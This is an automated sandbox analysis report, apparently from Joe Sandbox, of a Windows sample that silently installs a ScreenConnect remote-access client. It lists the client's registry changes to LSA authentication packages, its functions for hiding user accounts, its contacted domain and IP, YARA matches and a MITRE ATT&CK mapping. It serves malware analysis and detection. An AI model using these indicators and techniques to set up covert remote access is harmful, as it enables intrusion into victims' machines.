                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe VolumeInformation
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Client.dll VolumeInformation
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Core.dll VolumeInformation
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Windows.dll VolumeInformation
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.dll VolumeInformation
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeCode function: 7_2_00B34C62 RtlGetVersion,7_2_00B34C62
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                                  Lowering of HIPS / PFW / Operating System Security Settings

                                  barindex
                                  Modifies security policies related information
                                  Source: C:\Windows\System32\msiexec.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa Authentication PackagesJump to behavior
                                  Source: Yara matchFile source: f53WqfzzNt.exe, type: SAMPLE
                                  Source: Yara matchFile source: 0.2.f53WqfzzNt.exe.5a90000.9.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 8.0.ScreenConnect.WindowsClient.exe.e60000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 8.2.ScreenConnect.WindowsClient.exe.316fa10.0.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.2.f53WqfzzNt.exe.5a90000.9.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 10.2.ScreenConnect.WindowsClient.exe.23bfa50.3.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.0.f53WqfzzNt.exe.fd5db0.4.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.0.f53WqfzzNt.exe.fac3d4.2.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.0.f53WqfzzNt.exe.f263d4.5.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.0.f53WqfzzNt.exe.f10000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000000.00000002.1747609157.0000000005A90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000008.00000000.1778391029.0000000000E62000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000008.00000002.3574448875.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000000.00000000.1715442940.0000000000F26000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000A.00000002.1829941114.0000000002341000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: f53WqfzzNt.exe PID: 7480, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7680, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 7924, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 8116, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Windows\Temp\~DFCC421647BED1434B.TMP, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Temp\~DFCD8E0A85204A1AE0.TMP, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Temp\~DFE92FC617A28FB7B7.TMP, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Temp\~DF8EE2806658991912.TMP, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Temp\~DF61A468A6AB3D1920.TMP, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Temp\~DFFEA70B09147D26F1.TMP, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Installer\inprogressinstallinfo.ipi, type: DROPPED
                                  Source: Yara matchFile source: C:\Config.Msi\4ec960.rbs, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Installer\MSICBE0.tmp, type: DROPPED
                                  Source: Yara matchFile source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe, type: DROPPED

                                  Mitre Att&ck Matrix

                                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                  Gather Victim Identity InformationAcquire Infrastructure1
                                  Valid Accounts                                  		31
                                  Windows Management Instrumentation                                  		1
                                  DLL Side-Loading                                  		1
                                  DLL Side-Loading                                  		11
                                  Disable or Modify Tools                                  		OS Credential Dumping11
                                  Peripheral Device Discovery                                  		Remote Services11
                                  Archive Collected Data                                  		2
                                  Encrypted Channel                                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                                  CredentialsDomains1
                                  Replication Through Removable Media                                  		1
                                  Native API                                  		1
                                  DLL Search Order Hijacking                                  		1
                                  DLL Search Order Hijacking                                  		1
                                  Deobfuscate/Decode Files or Information                                  		LSASS Memory1
                                  File and Directory Discovery                                  		Remote Desktop ProtocolData from Removable Media1
                                  Non-Standard Port                                  		Exfiltration Over BluetoothNetwork Denial of Service
                                  Email AddressesDNS ServerDomain Accounts12
                                  Command and Scripting Interpreter                                  		1
                                  Component Object Model Hijacking                                  		1
                                  Component Object Model Hijacking                                  		1
                                  Obfuscated Files or Information                                  		Security Account Manager55
                                  System Information Discovery                                  		SMB/Windows Admin SharesData from Network Shared Drive1
                                  Non-Application Layer Protocol                                  		Automated ExfiltrationData Encrypted for Impact
                                  Employee NamesVirtual Private ServerLocal AccountsCron1
                                  Valid Accounts                                  		1
                                  Valid Accounts                                  		1
                                  Software Packing                                  		NTDS31
                                  Security Software Discovery                                  		Distributed Component Object ModelInput Capture1
                                  Application Layer Protocol                                  		Traffic DuplicationData Destruction
                                  Gather Victim Network InformationServerCloud AccountsLaunchd2
                                  Windows Service                                  		1
                                  Access Token Manipulation                                  		1
                                  DLL Side-Loading                                  		LSA Secrets2
                                  Process Discovery                                  		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                  Domain PropertiesBotnetReplication Through Removable MediaScheduled Task1
                                  Bootkit                                  		2
                                  Windows Service                                  		1
                                  DLL Search Order Hijacking                                  		Cached Domain Credentials61
                                  Virtualization/Sandbox Evasion                                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items12
                                  Process Injection                                  		1
                                  File Deletion                                  		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job122
                                  Masquerading                                  		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                                  Valid Accounts                                  		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                                  Access Token Manipulation                                  		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd61
                                  Virtualization/Sandbox Evasion                                  		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                                  Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task12
                                  Process Injection                                  		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                                  Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
                                  Hidden Users                                  		GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
                                  Business RelationshipsServerTrusted RelationshipVisual BasicContainer Orchestration JobContainer Orchestration Job1
                                  Bootkit                                  		Web Portal CaptureLocal GroupsComponent Object Model and Distributed COMLocal Email CollectionInternal ProxyCommonly Used PortDirect Network Flood
                                  Identify Business TempoBotnetHardware AdditionsPythonHypervisorProcess Injection1
                                  Rundll32                                  		Credential API HookingDomain GroupsExploitation of Remote ServicesRemote Email CollectionExternal ProxyTransfer Data to Cloud AccountReflection Amplification

                                  Behavior Graph

                                  Hide Legend

                                  Legend:

                                  • Process
                                  • Signature
                                  • Created File
                                  • DNS/IP Info
                                  • Is Dropped
                                  • Is Windows Process
                                  • Number of created Registry Values
                                  • Number of created Files
                                  • Visual Basic
                                  • Delphi
                                  • Java
                                  • .Net C# or VB.NET
                                  • C, C++ or other language
                                  • Is malicious
                                  • Internet
                                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1567469 Sample: f53WqfzzNt.exe Startdate: 03/12/2024 Architecture: WINDOWS Score: 46 57 sc.connectprotocol.es 2->57 65 Multi AV Scanner detection for submitted file 2->65 67 .NET source code contains potential unpacker 2->67 69 .NET source code references suspicious native API functions 2->69 71 4 other signatures 2->71 8 msiexec.exe 93 49 2->8         started        12 ScreenConnect.ClientService.exe 2 5 2->12         started        15 f53WqfzzNt.exe 6 2->15         started        17 svchost.exe 1 1 2->17         started        signatures3 process4 dnsIp5 45 ScreenConnect.Wind...dentialProvider.dll, PE32+ 8->45 dropped 47 C:\...\ScreenConnect.WindowsClient.exe, PE32 8->47 dropped 49 C:\...\ScreenConnect.ClientService.exe, PE32 8->49 dropped 53 10 other files (1 malicious) 8->53 dropped 73 Enables network access during safeboot for specific services 8->73 75 Modifies security policies related information 8->75 19 msiexec.exe 8->19         started        21 msiexec.exe 1 8->21         started        23 msiexec.exe 8->23         started        59 sc.connectprotocol.es 38.69.12.167, 49731, 8041 54583US United States 12->59 77 Reads the Security eventlog 12->77 79 Reads the System eventlog 12->79 25 ScreenConnect.WindowsClient.exe 12->25         started        28 ScreenConnect.WindowsClient.exe 2 12->28         started        51 C:\Users\user\AppData\...\f53WqfzzNt.exe.log, ASCII 15->51 dropped 81 Contains functionality to hide user accounts 15->81 30 msiexec.exe 6 15->30         started        61 127.0.0.1 unknown unknown 17->61 file6 signatures7 process8 file9 33 rundll32.exe 11 19->33         started        83 Creates files in the system32 config directory 25->83 85 Contains functionality to hide user accounts 25->85 55 C:\Users\user\AppData\Local\...\MSIC2F6.tmp, PE32 30->55 dropped signatures10 process11 file12 37 C:\Users\user\...\ScreenConnect.Windows.dll, PE32 33->37 dropped 39 C:\...\ScreenConnect.InstallerActions.dll, PE32 33->39 dropped 41 C:\Users\user\...\ScreenConnect.Core.dll, PE32 33->41 dropped 43 4 other files (none is malicious) 33->43 dropped 63 Contains functionality to hide user accounts 33->63 signatures13

                                  Screenshots

                                  Thumbnails

                                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                  windows-stand

                                  Antivirus, Machine Learning and Genetic Malware Detection

                                  Initial Sample

                                  SourceDetectionScannerLabelLink
                                  f53WqfzzNt.exe26%ReversingLabsWin32.Trojan.Generic

                                  Dropped Files

                                  SourceDetectionScannerLabelLink
                                  C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Client.dll0%ReversingLabs
                                  C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.dll0%ReversingLabs
                                  C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe0%ReversingLabs
                                  C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Core.dll0%ReversingLabs
                                  C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Windows.dll0%ReversingLabs
                                  C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsAuthenticationPackage.dll0%ReversingLabs
                                  C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsBackstageShell.exe0%ReversingLabs
                                  C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe0%ReversingLabs
                                  C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsCredentialProvider.dll0%ReversingLabs
                                  C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsFileManager.exe0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp-\Microsoft.Deployment.Compression.Cab.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp-\Microsoft.Deployment.Compression.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp-\Microsoft.Deployment.WindowsInstaller.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp-\ScreenConnect.Core.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp-\ScreenConnect.InstallerActions.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp-\ScreenConnect.Windows.dll0%ReversingLabs
                                  C:\Windows\Installer\MSICBF0.tmp0%ReversingLabs
                                  C:\Windows\Installer\MSICFCA.tmp0%ReversingLabs

                                  Unpacked PE Files

                                  No Antivirus matches

                                  Domains

                                  No Antivirus matches

                                  URLs

                                  No Antivirus matches

                                  Domains and IPs

                                  Contacted Domains

                                  NameIPActiveMaliciousAntivirus DetectionReputation
                                  sc.connectprotocol.es
                                  		38.69.12.167
                                  		truefalse
                                    		high

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    http://www.apache.org/licenses/LICENSE-2.0ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.fontbureau.comScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.fontbureau.com/designersGScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.fontbureau.com/designers/?ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.founder.com.cn/cn/bTheScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.fontbureau.com/designers?ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/vrundll32.exe, 00000004.00000003.1736264146.000000000453B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1736264146.00000000045AA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1736511091.0000000004433000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr, Microsoft.Deployment.Compression.dll.4.dr, Microsoft.Deployment.Compression.Cab.dll.4.drfalse
                                                  		high
                                                  https://docs.rs/getrandom#nodejs-es-module-supportScreenConnect.WindowsCredentialProvider.dll.2.drfalse
                                                    		high
                                                    http://crl.ver)svchost.exe, 00000009.00000002.3446163571.000001859C093000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.tiro.comScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://g.live.com/odclientsettings/ProdV2.C:edb.log.9.dr, qmgr.db.9.drfalse
                                                          		high
                                                          http://www.fontbureau.com/designersScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://wixtoolset.org/news/rundll32.exe, 00000004.00000003.1736264146.000000000453B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1736264146.00000000045AA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1736511091.0000000004433000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr, Microsoft.Deployment.Compression.dll.4.dr, Microsoft.Deployment.Compression.Cab.dll.4.drfalse
                                                              		high
                                                              http://www.goodfont.co.krScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.carterandcone.comlScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.sajatypeworks.comScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.typography.netDScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://g.live.com/odclientsettings/Prod.C:edb.log.9.dr, qmgr.db.9.drfalse
                                                                        		high
                                                                        http://www.fontbureau.com/designers/cabarga.htmlNScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.founder.com.cn/cn/cTheScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.galapagosdesign.com/staff/dennis.htmScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://wixtoolset.org/releases/rundll32.exe, 00000004.00000003.1736264146.000000000453B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1736264146.00000000045AA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1736511091.0000000004433000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr, Microsoft.Deployment.Compression.dll.4.dr, Microsoft.Deployment.Compression.Cab.dll.4.drfalse
                                                                                		high
                                                                                http://www.founder.com.cn/cnScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.fontbureau.com/designers/frere-user.htmlScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://g.live.com/odclientsettings/ProdV2edb.log.9.dr, qmgr.db.9.drfalse
                                                                                      		high
                                                                                      https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96svchost.exe, 00000009.00000003.1801728222.000001859BF12000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.drfalse
                                                                                        		high
                                                                                        http://www.jiyu-kobo.co.jp/ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://feedback.screenconnect.com/Feedback.axdScreenConnect.Core.dll.2.drfalse
                                                                                            		high
                                                                                            http://www.galapagosdesign.com/DPleaseScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://www.fontbureau.com/designers8ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://www.fonts.comScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://www.sandoll.co.krScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://www.urwpp.deDPleaseScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://www.zhongyicts.com.cnScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namef53WqfzzNt.exe, 00000000.00000002.1727538810.0000000003151000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000007.00000002.3577508560.0000000001719000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1829941114.0000000002341000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://www.sakkal.comScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 00000009.00000003.1801728222.000001859BF12000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.dr, qmgr.db.9.drfalse
                                                                                                              		high

                                                                                                              World Map of Contacted IPs

                                                                                                              • No. of IPs < 25%
                                                                                                              • 25% < No. of IPs < 50%
                                                                                                              • 50% < No. of IPs < 75%
                                                                                                              • 75% < No. of IPs

                                                                                                              Public IPs

                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                              38.69.12.167
                                                                                                              		sc.connectprotocol.esUnited States
                                                                                                              		5458354583USfalse

                                                                                                              Private

                                                                                                              IP
                                                                                                              127.0.0.1

                                                                                                              General Information

                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                              Analysis ID:1567469
                                                                                                              Start date and time:2024-12-03 16:22:31 +01:00
                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                              Overall analysis duration:0h 9m 38s
                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                              Report type:full
                                                                                                              Cookbook file name:default.jbs
                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                              Run name:Run with higher sleep bypass
                                                                                                              Number of analysed new started processes analysed:15
                                                                                                              Number of new started drivers analysed:0
                                                                                                              Number of existing processes analysed:0
                                                                                                              Number of existing drivers analysed:0
                                                                                                              Number of injected processes analysed:0
                                                                                                              Technologies:
                                                                                                              • HCA enabled
                                                                                                              • EGA enabled
                                                                                                              • AMSI enabled
